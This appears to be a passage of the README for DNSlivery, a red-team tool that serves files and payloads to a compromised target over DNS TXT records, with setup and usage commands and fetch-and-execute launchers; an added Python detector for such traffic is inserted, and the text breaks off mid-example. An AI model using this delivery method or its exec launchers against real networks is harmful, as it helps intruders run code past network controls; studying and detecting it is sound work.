DNSlivery - Easy Files and Payloads Delivery over DNS
Easy files and payloads delivery over DNS.
Acknowledgments
This project has been originally inspired by PowerDNS and Joff Thyer's technical segment on the Paul's Security Weekly podcast #590 (youtu.be/CP6cIwFJswQ).
Description
TL;DR
DNSlivery allows delivering files to a target using DNS as the transport protocol.
Features:
- allows printing, executing or saving files on the target
- does not require any client on the target
- does not require a full-fledged DNS server
What problem are you trying to solve?
Easily deliver files and/or payloads to a compromised target where classic web delivery is not possible and without the need for dedicated client software. This applies to restricted environments where outgoing web traffic is forbidden or closely inspected by a curious web proxy.
Even though more complete DNS tunneling tools already exist (e.g. dnscat2 and iodine), they all require running a dedicated client on the target. The problem is that there is probably no other way than DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools requires already having a DNS communication channel.
In comparison, DNSlivery only provides one-way communication from your server to the target but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more advanced DNS tunneling tool to your target.
How does it work?
Just like most DNS tunneling tools, DNSlivery uses TXT records to store the content of files in their base64 representation. However, it does not require setting up a full-fledged DNS server to work. Instead, it uses the scapy library to listen for incoming DNS packets and craft the desired response.
As most files do not fit in a single TXT record, DNSlivery will create multiple ordered records containing base64 chunks of the file. As an example, the above diagram illustrates the delivery of the 42nd chunk of the file named file.
In order to retrieve all base64 chunks and put them back together without the need for a dedicated client on the target, DNSlivery will generate for every file:
- a simple cleartext launcher
- a reliable base64 encoded stager
This two-stage delivery process is required to add features to the stager (e.g. handling lost DNS responses) that would otherwise not fit in a single TXT record.
Note on target compatibility
Currently, only PowerShell targets are supported. However, DNSlivery could be improved to support additional targets such as bash or python. Please let me know @no0be if this is a feature that you would like to see implemented.
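The chunked TXT-record delivery described above leaves a distinctive pattern in resolver query logs: one launcher lookup followed by a burst of numbered TXT lookups under the same delegated zone. The following Python is an added detection example, not part of DNSlivery; the log line format and the `<file>.<n>.<zone>` chunk naming are assumptions made for this example, while the .print/.exec/.save launcher names come from the README.

```python
import re
from collections import defaultdict

# Constructed resolver log lines (not real traffic), format "<epoch> <client> <qtype> <qname>".
# Chunk names <file>.<n>.<zone> are an assumption about DNSlivery's record layout made for this example.
SAMPLE_LOG = """\
1700000000 10.0.0.5 A www.example.com
1700000001 10.0.0.5 TXT file.exec.dnsd.no0.be
1700000002 10.0.0.5 TXT file.1.dnsd.no0.be
1700000002 10.0.0.5 TXT file.2.dnsd.no0.be
1700000003 10.0.0.5 TXT file.3.dnsd.no0.be
1700000003 10.0.0.5 TXT file.5.dnsd.no0.be
1700000004 10.0.0.5 TXT file.4.dnsd.no0.be
1700000004 10.0.0.5 TXT file.6.dnsd.no0.be
1700000004 10.0.0.5 TXT file.7.dnsd.no0.be
1700000010 10.0.0.9 TXT example.com
"""

LAUNCHER_RE = re.compile(r"^(?P<file>[a-z0-9-]+)\.(?P<action>print|exec|save)\.(?P<zone>.+)$")
CHUNK_RE = re.compile(r"^(?P<file>[a-z0-9-]+)\.(?P<idx>\d+)\.(?P<zone>.+)$")

def parse_log(text):
    """Yield (ts, client, qtype, qname) tuples from the constructed log format."""
    for line in text.splitlines():
        ts, client, qtype, qname = line.split()
        yield int(ts), client, qtype, qname.lower().rstrip(".")

def detect_dns_delivery(text, min_chunks=5):
    """Flag (client, file, zone) triples whose TXT queries look like a chunked file transfer."""
    launchers = set()
    chunks = defaultdict(set)  # (client, file, zone) -> set of chunk indices seen
    for _ts, client, qtype, qname in parse_log(text):
        if qtype != "TXT":
            continue
        m = LAUNCHER_RE.match(qname)
        if m:
            launchers.add((client, m["file"], m["zone"], m["action"]))
            continue
        m = CHUNK_RE.match(qname)
        if m:
            chunks[(client, m["file"], m["zone"])].add(int(m["idx"]))
    alerts = []
    for (client, fname, zone), idxs in chunks.items():
        actions = {a for c, f, z, a in launchers if (c, f, z) == (client, fname, zone)}
        # Chunks are numbered 1..N; sets absorb retries of lost responses, so a gap-free run is the signature.
        contiguous = max(idxs) - min(idxs) + 1 == len(idxs)
        if len(idxs) >= min_chunks and (actions or contiguous):
            alerts.append({"client": client, "file": fname, "zone": zone,
                           "chunks": len(idxs), "actions": sorted(actions)})
    return alerts
```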
Requirements
DNSlivery does not require building a complex server infrastructure. In fact, there are only 2 simple requirements:
- be able to create a NS record in your public DNS zone
- have a Linux server capable of receiving udp/53 traffic from the Internet
Setup
DNS Zone
The first step is to delegate a sub-domain to the server that will run DNSlivery by creating a new NS record in your domain. As an example, I created the following record to delegate the sub-domain dnsd.no0.be to the server at vps.no0.be.
    dnsd IN NS vps.no0.be.
If your zone is managed by a third-party provider, refer to their documentation to create the NS record.
DNSlivery
The only requirements to run DNSlivery are python3 and its scapy library.
    git clone https://github.com/no0be/DNSlivery.git && cd DNSlivery
    pip install -r requirements.txt
Usage
Server
DNSlivery will serve all files of a given directory (pwd by default) and needs to be run with root privileges to listen for incoming udp/53 packets.
    usage: dnslivery.py [-h] [-p PATH] [-s SIZE] [-v] interface domain nameserver

    DNSlivery - Easy files and payloads delivery over DNS

    positional arguments:
      interface             interface to listen to DNS traffic
      domain                FQDN name of the DNS zone
      nameserver            FQDN name of the server running DNSlivery

    optional arguments:
      -h, --help            show this help message and exit
      -p PATH, --path PATH  path of directory to serve over DNS (default: pwd)
      -s SIZE, --size SIZE  size in bytes of base64 chunks (default: 255)
      -v, --verbose         increase verbosity
Example:
    $ sudo python3 dnslivery.py eth0 dnsd.no0.be vps.no0.be -p /tmp/dns-delivery
    DNSlivery - Easy files and payloads delivery over DNS
    [*] File "file" ready for delivery at file.dnsd.no0.be (7 chunks)
    [*] Listening for DNS queries...
Note on filename normalization
As the charset allowed for domain names is much more restrictive than for UNIX filenames (per RFC1035), DNSlivery will perform normalization when required.
Example:
[*] File "My Awesome Powershell Script ;).ps1" ready for delivery at my-awesome-powershell-script----ps1.dnsd.no0.be (1891 chunks)
Be aware that the current normalization code is not perfect as it does not take overlapping filenames or the size limit into account.
Target
On the target, start by retrieving the launcher of the desired file by requesting its dedicated TXT record. The following 3 launchers are supported:
Action | Launcher | Description |
---|---|---|
Print | [filename].print.[domain] | (Default) Print the delivered file to the console |
Execute | [filename].exec.[domain] | Execute the delivered file (useful for scripts) |
Save | [filename].save.[domain] | Save the delivered file to disk (useful for binaries) |
    nslookup -type=txt [filename].[stager].[domain]
Example: